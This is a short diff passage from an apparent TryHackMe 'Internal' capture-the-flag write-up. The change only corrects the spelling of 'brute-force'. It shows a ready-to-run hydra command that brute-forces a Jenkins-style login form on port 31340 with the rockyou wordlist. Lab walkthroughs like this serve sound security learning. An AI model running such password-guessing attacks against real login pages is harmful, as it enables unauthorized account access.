FullByte/FullByte.github.io/docs/tech/hack/challenges/tryhackme.com/internal.md

 ![_internal_burpsuite](_internal_burpsuite.jpg)

-Using the information from the intercepted post command of a failed login attempt we can build the hdyra bruteforce attack:
+Using the information from the intercepted post command of a failed login attempt we can build the hdyra brute-force attack:

 ```sh
 hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost -s 31340 http-post-form "/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=&Submit=Sign+in:F=Invalid"